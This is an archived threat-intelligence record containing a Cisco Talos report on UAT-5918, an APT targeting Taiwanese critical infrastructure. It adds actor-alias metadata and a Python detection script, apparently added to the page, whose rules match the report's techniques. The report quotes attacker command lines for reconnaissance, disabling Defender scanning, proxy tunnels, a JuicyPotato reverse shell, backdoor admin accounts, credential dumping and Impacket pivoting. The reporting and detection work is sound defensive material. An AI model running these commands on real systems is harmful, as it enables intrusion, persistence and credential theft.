{
	"id": "01792c3f-4a02-4afd-bce2-27679db52091",
	"created_at": "2026-04-06T00:16:30.729552Z",
	"updated_at": "2026-04-10T03:34:44.495293Z",
	"deleted_at": null,
	"sha1_hash": "24f745594ec13d4635c14e424343c37df2ad3dcf",
	"title": "UAT-5918 targets critical infrastructure entities in Taiwan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 671675,
	"plain_text": "UAT-5918 targets critical infrastructure entities in Taiwan\r\nBy Jungsoo An\r\nPublished: 2025-03-20 · Archived: 2026-04-05 15:39:03 UTC\r\nCisco Talos discovered a malicious campaign we track under the UAT-5918 umbrella that has been active\r\nsince at least 2023.\r\nUAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft,\r\nuses a combination of web shells and open-source tooling to conduct post-compromise activities that\r\nestablish persistence in victim environments for information theft and credential harvesting.\r\nWe assess that UAT-5918's post-compromise activity, tactics, techniques, and procedures (TTPs), and\r\nvictimology overlap most with Volt Typhoon, Flax Typhoon, Earth Estries, and Dalbit intrusions\r\nwe’ve observed in the past.\r\nUAT-5918’s activity cluster\r\nOverview\r\nTalos assesses with high confidence that UAT-5918 is an advanced persistent threat (APT) group that targets\r\nentities in Taiwan to establish long-term persistent access in victim environments. UAT-5918 usually obtains\r\ninitial access by exploiting N-day vulnerabilities in unpatched web and application servers exposed to the internet.\r\nThe threat actor subsequently uses a plethora of open-source tools for network reconnaissance to move\r\nthrough the compromised enterprise.\r\nThe activity that we monitored suggests that the post-compromise activity is done manually with the main goal\r\nbeing information theft. This also includes deployment of web shells across any discovered sub-domains\r\nand internet-accessible servers to open multiple points of entry to the victim organizations. 
UAT-5918's intrusions\r\nharvest local and domain-level user credentials and create new administrative user\r\naccounts to facilitate additional channels of access, such as RDP to endpoints of significance to the threat actor.\r\nTypical tooling used by UAT-5918 includes networking tools such as FRPC, FScan, In-Swor, Earthworm, and\r\nNeo-reGeorg. Credential harvesting is accomplished by dumping registry hives and NTDS, and by using tools such as\r\nMimikatz and browser credential extractors. These credentials are then used to perform lateral movement via\r\nRDP, WMIC or PowerShell remoting, or Impacket.\r\nUAT-5918 activity cluster overlaps\r\nUAT-5918's tooling and TTPs overlap substantially with several APT groups including Volt Typhoon, Flax\r\nTyphoon and Dalbit.\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 1 of 12\n\nFigure 1. UAT-5918 TTPs and tooling overlaps with similar APT groups.\r\nThere is a significant overlap in post-compromise tooling and TTPs with Volt Typhoon, such as using ping and\r\ntools like In-Swor for network discovery; gathering system information such as drive and partition details; gathering\r\nlogical drive information such as names, IDs, size, and free space; credential dumping from web browser\r\napplications; using open-source tools such as frp, Earthworm, and Impacket for establishing control channels; and\r\nthe absence of custom-made malware. The U.S. government assesses that Volt Typhoon is a PRC state-sponsored\r\nactor conducting cyberattacks against U.S. critical infrastructure.\r\nMultiple tools used in this intrusion also overlap with tooling used by Flax Typhoon in the past, such as the\r\nChopper web shell, Mimikatz, JuicyPotato, Metasploit, WMIC and PowerShell, along with the use of tactics such\r\nas relying on RDP and other web shells to persist in the enterprise and WMIC for gathering system information.\r\nThe U.S. 
government attributes Flax Typhoon, a Chinese government-sponsored threat actor, to the Integrity\r\nTechnology Group, a PRC-based company.\r\nAdditionally, tooling such as FRP, FScan, In-Swor, and Neo-reGeorg, as well as file paths and names used by\r\nUAT-5918, overlap with those used by Tropic Trooper. Tropic Trooper’s malware suite, specifically Crowdoor\r\nLoader and SparrowDoor, overlaps with the threat actors known as Famous Sparrow and Earth Estries. We have\r\nalso observed overlaps in tooling and tactics between this campaign operated by UAT-5918 and operations\r\nconducted by Earth Estries, including the use of FRP, FScan, web shells, Impacket, living-off-the-land binaries\r\n(LoLBins), etc. Furthermore, we’ve discovered similar tooling between UAT-5918 and Dalbit consisting of port\r\nscanners, proxying tools, reverse shells, and reconnaissance TTPs.\r\nIt is worth noting that a sub-set of the tools UAT-5918 uses, such as LaZagne, SNetCracker, PortBrute, NetSpy etc.,\r\nhas not been seen in use by the aforementioned threat actors in public reporting. This tooling is likely either\r\nexclusive to UAT-5918, or its usage by other related groups has been omitted from publicly available disclosures.\r\nVictimology and targeted verticals\r\nUAT-5918 also overlaps with the previously mentioned APT groups in terms of targeted geographies and industry\r\nverticals, indicating that this threat actor’s operations align with the strategic goals of the aforementioned set of\r\nthreat actors.\r\nWe have primarily observed targeting of entities in Taiwan by UAT-5918 in industry verticals such as\r\ntelecommunications, healthcare, information technology, and other critical infrastructure sectors. 
Similar verticals\r\nand geographies have also been targeted by APT groups such as Volt Typhoon, Flax Typhoon, Earth Estries,\r\nTropic Trooper, and Dalbit.\r\nInitial access and reconnaissance\r\nUAT-5918 typically gains initial access to their victims via exploitation of known vulnerabilities on unpatched\r\nservers exposed to the internet. Activity following a successful compromise consists of preliminary\r\nreconnaissance to identify users and domains, and to gather system information. Typical commands executed on\r\nendpoints include:\r\nping \u003cIP\u003e\r\nnet user\r\nsysteminfo\r\narp -a\r\nroute print\r\ntasklist\r\ntasklist -v\r\nnetstat -ano\r\nwhoami\r\nipconfig\r\nquery user\r\ncmd /c dir c:\\users\\\u003cusername\u003e\\Desktop\r\ncmd /c dir c:\\users\\\u003cusername\u003e\\Documents\r\ncmd /c dir c:\\users\\\u003cusername\u003e\\Downloads\r\nInitial credential reconnaissance is carried out using the cmdkey command:\r\ncmdkey /list\r\nThe threat actor then downloads and places publicly available red-teaming tools (illustrated in\r\nsubsequent sections) on endpoints to carry out further actions. In some cases, UAT-5918 also excluded their\r\nworking directories on disk from Microsoft Defender scanning, then read the preference back to confirm it:\r\npowershell.exe -exec bypass Add-MpPreference -ExclusionPath \u003cworking_directory\u003e\r\npowershell Get-MpPreference\r\nPost-compromise tooling\r\nUAT-5918's post-compromise tooling consists of web shells, some of which are publicly available, such as the\r\nChopper web shell, multiple red-teaming and network scanning tools, and credential harvesters.\r\nReverse proxies and tunnels\r\nThe actor uses FRP and Neo-reGeorg to establish reverse proxy tunnels for accessing compromised endpoints via\r\nattacker-controlled remote hosts. 
The tools are usually downloaded as archives and extracted before execution:\r\nThe Earthworm (ew) tool for establishing proxies is also run:\r\nPort scanning\r\nFScan is a port and vulnerability scanning tool that can scan ranges of IP addresses and ports specified by the\r\nattackers:\r\nTalos has observed the actor scanning these ports in particular:\r\n21 22 80 81 83 91 135 443 445 888 808 889 5432 8000 8080 54577 11211\r\nThe threat actor also relies extensively on In-Swor, a publicly available tool authored and documented\r\nby Chinese-speaking individuals, for conducting port scans across ranges of IP addresses. A sample command of\r\nIn-Swor's use is:\r\nRun[.]exe -h \u003cip_range\u003e/24 -nopoc -pwdf pw[.]txt -p 1521,6379 -t 4\r\nIn-Swor was used to scan for the following ports across IP address ranges:\r\n22 SSH\r\n80 HTTP\r\n135 RPC\r\n445 SMB\r\n1433 SQL Server\r\n1521 Oracle DB\r\n3306 MySQL\r\n3389 RDP\r\n4194 cAdvisor (Kubernetes node metrics)\r\n5432 PostgreSQL\r\n5900 VNC\r\n6379 Redis\r\n10248 Kubernetes kubelet healthz\r\n10250 Kubernetes kubelet API\r\n10255 Kubernetes kubelet read-only API\r\nIn other instances, In-Swor, renamed to svchost[.]exe, was used to establish proxy channels:\r\nsvchost[.]exe proxy -l *:22 -k 9999\r\nsvchost[.]exe proxy -l *:443 -k 9999\r\nsvchost[.]exe proxy -hc -l *:443 -k 99997654\r\nsvchost[.]exe -hc proxy -l *:443 -k 99997654\r\nsvchost[.]exe proxy -l 443 -v\r\nsvchost[.]exe -type server -proto tcp -listen :443\r\nsvchost[.]exe -type server -proto http -listen :443\r\nsvchost[.]exe -type server -proto rhttp -listen :443\r\nIn addition to FScan, the threat actor also downloaded and used PortBrute, a password brute forcer for multiple\r\nprotocols such as FTP, SSH, SMB, MySQL, MongoDB, etc.:\r\nPortBruteWin(5).exe -up 
\u003cusername\u003e:\u003cpassword\u003e\r\nAdditional network reconnaissance\r\nThe threat actor uses two utilities for monitoring current connections on the compromised hosts — NirSoft's\r\nCurrPorts utility and TCPView. Both tools are likely used to perform additional network discovery to find\r\naccessible hosts to pivot to:\r\nC:\\Users\\\u003ccompromised_user\u003e\\Desktop\\cports-x64\\cports.exe\r\nC:\\Users\\\u003ccompromised_user\u003e\\Desktop\\TCPView\\tcpview64.exe\r\nThe threat actor also uses PowerShell-based scripts to attempt SMB logins to specific endpoints already identified\r\nby them:\r\npowershell[.]exe -file C:\\ProgramData\\smblogin-extra-mini.ps1\r\nNetspy, another tool authored and documented by Chinese-speaking individuals, is a network segmentation\r\ndiscovery tool that UAT-5918 employs occasionally for discovery. That the operator had to check the tool's help\r\noutput suggests hands-on-keyboard activity rather than automation, and that the tool is not part of their routine kit:\r\nnetspy[.]exe -h\r\nGathering local system information\r\nThe attackers also run commands to profile the endpoint and its drives:\r\nwmic diskdrive get partitions /value\r\nfsutil fsinfo drives\r\nwmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace\r\nwmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace /format:value\r\nMaintaining persistent access to victims\r\nThe threat actor attempts to deploy multiple web shells on systems they find are hosting web applications. The\r\nweb shells are typically ASP or PHP-based files placed deep inside housekeeping directories such as image\r\ndirectories, user file directories, etc. 
\r\nThe threat actor uses a web shell variant of JuicyPotato (a privilege escalation tool) that lets JuicyPotato act as\r\na web shell on the compromised system, accepting commands from remote systems to execute:\r\nJuicyPotato is then run to spawn cmd[.]exe as a reverse shell that allows the threat actor to run arbitrary\r\ncommands:\r\nRun.exe -t t -p c:\\windows\\system32\\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}\r\nUAT-5918 also uses PuTTY’s pscp tool to connect to and deliver additional web shells to accessible endpoints\r\n(likely servers) within the network:\r\npscp[.]exe \u003cweb_shell\u003e \u003cuser\u003e@\u003cIP\u003e:/var/www/html/\u003cweb_shell\u003e\r\nFurthermore, Talos has observed UAT-5918 execute reverse Meterpreter shells to maintain persistent access to the\r\ncompromised hosts:\r\nC:\\ProgramData\\bind.exe\r\nC:\\ProgramData\\microbind.exe\r\nC:\\ProgramData\\reverse.exe\r\ncmd /c C:/ProgramData/microbind.exe\r\nBackdoored user account creation\r\nUAT-5918 regularly creates user accounts on compromised endpoints and assigns them administrative privileges:\r\nnet user \u003cvictimname_username\u003e \u003cpassword\u003e /add\r\nnet localgroup administrators \u003cusername\u003e /add\r\nnet group \"domain admins\" \u003cusername\u003e /add /domain\r\nCredential harvesting is a key tactic in UAT-5918 intrusions, instrumented via the use of tools such as Mimikatz,\r\nLaZagne, and browser credential stealers:\r\nMimikatz: A commonly used credential extractor tool is run to obtain credentials from the endpoint:\r\nLaZagne: LaZagne is an open-source credential extractor:\r\nC:/ProgramData/LaZagne.exe\r\nC:/ProgramData/LaZagne.exe -all \u003e\u003e laz.txt\r\nRegistry dumps: The “reg” system command is used to 
take dumps of the SAM, SECURITY and SYSTEM\r\nhives:\r\nGoogle Chrome information: The adversary also uses a tool called BrowserDataLite to extract login\r\ninformation, cookies, and browsing history from web browsers. The extracted information is subsequently\r\naccessed via notepad[.]exe:\r\nBrowserDataLite_x64.exe\r\nC:\\Windows\\system32\\NOTEPAD.EXE Chrome_LoginPass.txt\r\nC:\\Windows\\system32\\NOTEPAD.EXE Chrome_Cookies.txt\r\nC:\\Windows\\system32\\NOTEPAD.EXE Chrome_History.txt\r\nSNETCracker: A .NET-based password cracker (brute forcer) for services such as SSH, RDP, FTP, MySQL,\r\nSMTP, Telnet, VNC, etc.\r\nFinding strings related to credentials, such as:\r\nfindstr /s /i /n /d:C:\\ password *.conf\r\nPivoting to additional endpoints\r\nUAT-5918 consistently attempts to gain access to additional endpoints within the enterprise. They perform\r\nnetwork reconnaissance cyclically to discover new endpoints worth pivoting to and attempt to gain access\r\nvia RDP or Impacket:\r\nmstsc.exe -v \u003chostname\u003e\r\nImpacket was also used on multiple occasions to pivot into additional endpoints and copy over tools:\r\npython wmiexec[.]py Administrator:\u003cpassword\u003e@\u003cIP\u003e -codec big5 1\u003e [\\][\\]127[.]0[.]0[.]1\\ADMIN$\\__\u003ctime\r\ncmd[.]exe /Q /c echo python wmiexec[.]py Administrator:\u003cpassword\u003e@\u003cIP\u003e -codec big5 ^\u003e \\\\\u003chostname\u003e\\C\r\ncmd[.]exe /Q /c net use [\\][\\]\u003cIP\u003e\\c$ /user:\u003cusername\u003e 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c dir [\\][\\]\u003cIP\u003e\\c$ 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c copy fscan64[.]exe [\\][\\]\u003cIP\u003e\\c$\\ 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c copy 
[\\][\\]\u003cIP\u003e\\c$\\\u003cscan_result\u003e.txt 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c copy fscan[.]exe [\\][\\]\u003cIP\u003e\\c$\\ 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c copy mimikatz[.]exe [\\][\\]\u003cIP\u003e\\c$ 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\nFile collection and staging\r\nUAT-5918 pivots across endpoints, enumerating local and shared drives to find data of interest to the threat actor.\r\nThis data may include anything that furthers the APT’s strategic and tactical goals, ranging from confidential\r\ndocuments, DB exports and backups to application configuration files. In one instance, the threat actor used the\r\nSQLCMD[.]exe utility to create a database backup that could be exfiltrated:\r\nC:/ProgramData/SQLCMD.EXE -S \u003ctarget_server_DB\u003e -U \u003cusername\u003e -P \u003cpassword\u003e -Q BACKUP DATABASE \u003cNAME\u003e\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. 
You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.\r\nSecure Access provides seamless, transparent and secure access to the internet, cloud services or private\r\napplications no matter where your users work. Please contact your Cisco account representative or authorized\r\npartner if you are interested in a free trial of Cisco Secure Access.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nIOCs for this research can also be found at our GitHub repository here. 
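The reconnaissance burst, the Defender exclusion, In-Swor running under the name svchost.exe with proxy arguments, the backdoor account creation, and the Impacket wmiexec command lines quoted in the sections above all leave traces in process-creation telemetry (Sysmon event 1 or Windows event 4688 command lines). The Python script below is an added example written for this page; it is not Talos code and not one of the tools the report describes. The sample events, host names, user names, addresses, the ten-minute window and the five-command burst threshold are assumptions made for the example.\r\n

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (timestamp, host, image path, command line),
# modelled on the command lines quoted in the report. Hosts, users and addresses are made up.
SAMPLE_EVENTS = [
    ('2025-01-10T02:00:00', 'ws07', 'C:\\Windows\\System32\\svchost.exe', 'svchost.exe -k netsvcs -p'),
    ('2025-01-10T02:00:01', 'web01', 'C:\\Windows\\System32\\cmd.exe', 'whoami'),
    ('2025-01-10T02:00:03', 'web01', 'C:\\Windows\\System32\\cmd.exe', 'net user'),
    ('2025-01-10T02:00:05', 'web01', 'C:\\Windows\\System32\\cmd.exe', 'systeminfo'),
    ('2025-01-10T02:00:07', 'web01', 'C:\\Windows\\System32\\cmd.exe', 'arp \u2013a'),
    ('2025-01-10T02:00:09', 'web01', 'C:\\Windows\\System32\\cmd.exe', 'netstat -ano'),
    ('2025-01-10T02:00:12', 'web01', 'C:\\Windows\\System32\\cmd.exe', 'cmdkey /list'),
    ('2025-01-10T02:01:00', 'web01', 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'powershell.exe -exec bypass Add-MpPreference -ExclusionPath C:\\ProgramData'),
    ('2025-01-10T02:05:00', 'web01', 'C:\\ProgramData\\svchost.exe', 'svchost.exe proxy -l *:443 -k 9999'),
    ('2025-01-10T02:06:00', 'web01', 'C:\\Windows\\System32\\net.exe', 'net user svc_backup Passw0rd! /add'),
    ('2025-01-10T02:06:02', 'web01', 'C:\\Windows\\System32\\net.exe', 'net localgroup administrators svc_backup /add'),
    ('2025-01-10T02:10:00', 'db01', 'C:\\Windows\\System32\\cmd.exe',
     'cmd.exe /Q /c dir \\\\10.0.0.5\\c$ 1> \\\\127.0.0.1\\ADMIN$\\__1736474400.12 2>&1'),
    ('2025-01-10T09:00:00', 'ws07', 'C:\\Windows\\System32\\cmd.exe', 'ipconfig'),
]

# Discovery commands listed in the report; one alone is noise, a burst of distinct ones is not.
RECON_RE = re.compile(
    r'^(?:cmd(?:\.exe)? /c )?(whoami|systeminfo|ipconfig|route print|tasklist(?: -v)?'
    r'|netstat -ano|arp -a|query user|cmdkey /list|net user|ping \S+|dir c:\\users\\\S+)$', re.I)
DEFENDER_EXCLUSION_RE = re.compile(r'add-mppreference\b.*-exclusionpath', re.I)
NET_USER_ADD_RE = re.compile(r'^net user (\S+) \S+ /add\b', re.I)
NET_ADMIN_GROUP_RE = re.compile(
    r'^net (?:localgroup administrators|group \S?domain admins\S?) (\S+) /add\b', re.I)
# Impacket wmiexec.py redirects each command's output to a share on 127.0.0.1 under __<timestamp>.
WMIEXEC_RE = re.compile(r'1>\s*\\\\127\.0\.0\.1\\[^\\\s]+\\__')
SYSTEM_DIRS = ('c:\\windows\\system32\\', 'c:\\windows\\syswow64\\')


def _parse(event):
    ts, host, image, cmdline = event
    # Collapse whitespace and turn the en dash seen in extracted reports ('arp \u2013a') into '-'.
    cl = ' '.join(cmdline.replace('\u2013', '-').split())
    return datetime.fromisoformat(ts), host, image, cl


def _svchost_masquerade(image, cl):
    # The real svchost.exe lives in a system directory and never takes proxy/server arguments.
    if image.rsplit('\\', 1)[-1].lower() != 'svchost.exe':
        return False
    low = cl.lower()
    return not image.lower().startswith(SYSTEM_DIRS) or ' proxy ' in low or '-type server' in low


def hunt(events, window=timedelta(minutes=10), min_distinct_recon=5):
    '''Return a list of {'host', 'rule', 'evidence'} hits for the patterns above.'''
    parsed = sorted(_parse(e) for e in events)
    hits = []
    recon = defaultdict(list)          # host -> [(time, normalised discovery command)]
    pending_users = defaultdict(dict)  # host -> {username: time of 'net user ... /add'}
    for ts, host, image, cl in parsed:
        m = RECON_RE.match(cl)
        if m:
            recon[host].append((ts, m.group(1).lower()))
        if DEFENDER_EXCLUSION_RE.search(cl):
            hits.append({'host': host, 'rule': 'defender_exclusion', 'evidence': cl})
        if _svchost_masquerade(image, cl):
            hits.append({'host': host, 'rule': 'svchost_masquerade', 'evidence': image + ' ' + cl})
        m = NET_USER_ADD_RE.match(cl)
        if m:
            pending_users[host][m.group(1).lower()] = ts
        m = NET_ADMIN_GROUP_RE.match(cl)
        if m:
            created = pending_users[host].get(m.group(1).lower())
            if created is not None and ts - created <= window:
                hits.append({'host': host, 'rule': 'admin_account', 'evidence': m.group(1)})
        if WMIEXEC_RE.search(cl):
            hits.append({'host': host, 'rule': 'wmiexec_artifact', 'evidence': cl})
    # Sliding window over each host's discovery commands; flag a host at most once.
    for host, seq in recon.items():
        for i, (start, _) in enumerate(seq):
            distinct = {c for t, c in seq[i:] if t - start <= window}
            if len(distinct) >= min_distinct_recon:
                hits.append({'host': host, 'rule': 'recon_burst', 'evidence': sorted(distinct)})
                break
    return hits


if __name__ == '__main__':
    for hit in hunt(SAMPLE_EVENTS):
        print(hit['host'], hit['rule'], hit['evidence'])
```

The recon rule fires only when five or more distinct discovery commands land on one host inside the window, which separates the hands-on-keyboard burst quoted above from an administrator running a single ipconfig; the admin-account rule ties a localgroup or domain-group addition back to the net user /add that preceded it on the same host; the wmiexec rule keys on the output redirection to a share on 127.0.0.1 under a file name beginning with two underscores, which is the artifact visible in the quoted Impacket command lines and is independent of which tool was copied.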
\r\n6F6F7AA6144A1CFE61AC0A80DB7AD712440BDC5730644E05794876EB8B6A41B4\r\nBAB01D029556CF6290F6F21FEC5932E13399F93C5FDBCFFD3831006745F0EB83\r\nF7F6D0AFB300B57C32853D49FF50650F5D1DC7CF8111AA32FF658783C038BFE5\r\n497A326C6C207C1FB49E4DAD81D051FCF6BCBE047E0D3FE757C298EF8FE99ABA\r\nF9EB34C34E4A91630F265F12569F70B83FEBA039C861D6BF906B74E7FB308648\r\nDD832C8E30ED50383495D370836688EE48E95334270CBBCE41109594CB0C9FD1\r\nF7B52EE613F8D4E55A69F0B93AA9AA5472E453B0C458C8390DB963FF8B0B769C\r\nB994CBC1B5C905A2B731E47B30718C684521E8EC6AFB601AFECF30EF573E5153\r\n12D4EFE2B21B5053A3A21B49F25A6A4797DC6E9A80D511F29CA67039BA361F63\r\n2272925B1E83C7C3AB24BDEB82CE727DB84F5268C70744345CDA41B452C49E84\r\n71EB5115E8C47FFF1AB0E7ACEBAEA7780223683259A2BB1B8DB1EB3F26878CA4\r\nE159824448A8E53425B38BD11030AA786C460F956C9D7FC118B212E8CED4087A\r\n7EF22BFB6B2B2D23FE026BDFD7D2304427B6B62C6F9643EFEDDB4820EBF865AF\r\nEFC0D2C1E05E106C5C36160E17619A494676DEB136FB877C6D26F3ADF75A5777\r\nB7690c0fc9ec32e1a54663a2e5581e6260fe9318a565a475ee8a56c0638f38d0\r\nA774244ea5d759c4044aea75128a977e45fd6d1bb5942d9a8a1c5d7bff7e3db9\r\n31742ab79932af3649189b9287730384215a8dccdf21db50de320da7b3e16bb4\r\n09cea8aed5c58c446e6ef4d9bb83f7b5d7ba7b7c89d4164f397d378832722b69\r\nD47e35baee57eb692065a2295e3e9de40e4c57dba72cb39f9acb9f564c33b421\r\n1753fa34babeeee3b20093b72987b7f5e257270f86787c81a556790cb322c747\r\nF4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e\r\n5b0f8c650f54f17d002c01dcc74713a40eccb0367357d3f86490e9d17fcd71e8\r\n3588bda890ebf6138a82ae2e4f3cd7234ec071f343c9f5db5a96a54734eeaf9f\r\n95eee44482b4226efe3739bed3fa6ce7ae7db407c1e82e988f27cd27a31b56a6\r\n02ab315e4e3cf71c1632c91d4914c21b9f6e0b9aa0263f2400d6381aab759a61\r\nD1825cd7a985307c8585d88d247922c3a51835f9338dc76c10cdbad859900a03\r\n234899dea0a0e91c67c7172204de3a92a4cbeef37cdc10f563bf78343234ad1d\r\n8d440c5f0eca705c6d27aa4883c9cc4f8711de30fea32342d44a286b362efa9a\r\nFfb8db57b543ba8a5086640a0b59a5def4929ad261e9f3624b2c0a22ae380391\r\nSource: 
https://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/"
	],
	"report_names": [
		"uat-5918-targets-critical-infra-in-taiwan"
	],
	"threat_actors": [
		{
			"id": "846522d7-29cb-4a0c-8ebe-ffba7429e2d7",
			"created_at": "2023-06-23T02:04:34.793629Z",
			"updated_at": "2026-04-10T02:00:04.971054Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"Bronze Silhouette",
				"Dev-0391",
				"Insidious Taurus",
				"Redfly",
				"Storm-0391",
				"UAT-5918",
				"UAT-7237",
				"UNC3236",
				"VOLTZITE",
				"Vanguard Panda"
			],
			"source_name": "ETDA:Volt Typhoon",
			"tools": [
				"FRP",
				"Fast Reverse Proxy",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"Living off the Land"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f67fb5b3-b0d4-484c-943e-ebf12251eff6",
			"created_at": "2022-10-25T16:07:23.605611Z",
			"updated_at": "2026-04-10T02:00:04.685162Z",
			"deleted_at": null,
			"main_name": "FamousSparrow",
			"aliases": [
				"Earth Estries"
			],
			"source_name": "ETDA:FamousSparrow",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "09031838-56db-4676-a2b2-4bc50d8b7b0b",
			"created_at": "2024-01-23T13:22:35.078612Z",
			"updated_at": "2026-04-10T02:00:03.519282Z",
			"deleted_at": null,
			"main_name": "Flax Typhoon",
			"aliases": [
				"Ethereal Panda",
				"Storm-0919"
			],
			"source_name": "MISPGALAXY:Flax Typhoon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bcf899bb-34bb-43e1-929d-02bc91974f2a",
			"created_at": "2023-02-18T02:04:24.050644Z",
			"updated_at": "2026-04-10T02:00:04.639142Z",
			"deleted_at": null,
			"main_name": "Dalbit",
			"aliases": [],
			"source_name": "ETDA:Dalbit",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agentemis",
				"AntSword",
				"BadPotato",
				"BlueShell",
				"CHINACHOPPER",
				"China Chopper",
				"Cobalt Strike",
				"CobaltStrike",
				"EFSPotato",
				"FRP",
				"Fast Reverse Proxy",
				"Godzilla",
				"Godzilla Loader",
				"HTran",
				"HUC Packet Transmit Tool",
				"JuicyPotato",
				"LadonGo",
				"Metasploit",
				"Mimikatz",
				"NPS",
				"ProcDump",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"RottenPotato",
				"SinoChopper",
				"SweetPotato",
				"cobeacon",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "86c7abc2-1b71-4665-b9e3-1594d6d15a4a",
			"created_at": "2023-09-07T02:02:47.367254Z",
			"updated_at": "2026-04-10T02:00:04.698935Z",
			"deleted_at": null,
			"main_name": "Flax Typhoon",
			"aliases": [
				"Ethereal Panda",
				"RedJuliett"
			],
			"source_name": "ETDA:Flax Typhoon",
			"tools": [
				"BadPotato",
				"CHINACHOPPER",
				"China Chopper",
				"JuicyPotato",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Metasploit",
				"Mimikatz",
				"SinoChopper",
				"SoftEther VPN"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc",
			"created_at": "2023-01-06T13:46:38.354607Z",
			"updated_at": "2026-04-10T02:00:02.939761Z",
			"deleted_at": null,
			"main_name": "APT23",
			"aliases": [
				"BRONZE HOBART",
				"G0081",
				"Red Orthrus",
				"Earth Centaur",
				"PIRATE PANDA",
				"KeyBoy",
				"Tropic Trooper"
			],
			"source_name": "MISPGALAXY:APT23",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bef7800a-a08f-4e21-b65c-4279c851e572",
			"created_at": "2022-10-25T15:50:23.409336Z",
			"updated_at": "2026-04-10T02:00:05.319608Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"Tropic Trooper",
				"Pirate Panda",
				"KeyBoy"
			],
			"source_name": "MITRE:Tropic Trooper",
			"tools": [
				"USBferry",
				"ShadowPad",
				"PoisonIvy",
				"BITSAdmin",
				"YAHOYAH",
				"KeyBoy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a09ade2a-6b87-4f9a-b4f8-23cf14f63633",
			"created_at": "2023-11-04T02:00:07.676869Z",
			"updated_at": "2026-04-10T02:00:03.389898Z",
			"deleted_at": null,
			"main_name": "Earth Estries",
			"aliases": [],
			"source_name": "MISPGALAXY:Earth Estries",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff",
			"created_at": "2024-12-28T02:01:54.899899Z",
			"updated_at": "2026-04-10T02:00:04.880446Z",
			"deleted_at": null,
			"main_name": "Salt Typhoon",
			"aliases": [
				"Earth Estries",
				"FamousSparrow",
				"GhostEmperor",
				"Operator Panda",
				"RedMike",
				"Salt Typhoon",
				"UNC2286"
			],
			"source_name": "ETDA:Salt Typhoon",
			"tools": [
				"Agentemis",
				"Backdr-NQ",
				"Cobalt Strike",
				"CobaltStrike",
				"Crowdoor",
				"Cryptmerlin",
				"Deed RAT",
				"Demodex",
				"FamousSparrow",
				"FuxosDoor",
				"GHOSTSPIDER",
				"HemiGate",
				"MASOL RAT",
				"Mimikatz",
				"NBTscan",
				"NinjaCopy",
				"ProcDump",
				"PsExec",
				"PsList",
				"SnappyBee",
				"SparrowDoor",
				"TrillClient",
				"WinRAR",
				"Zingdoor",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"nbtscan"
			],
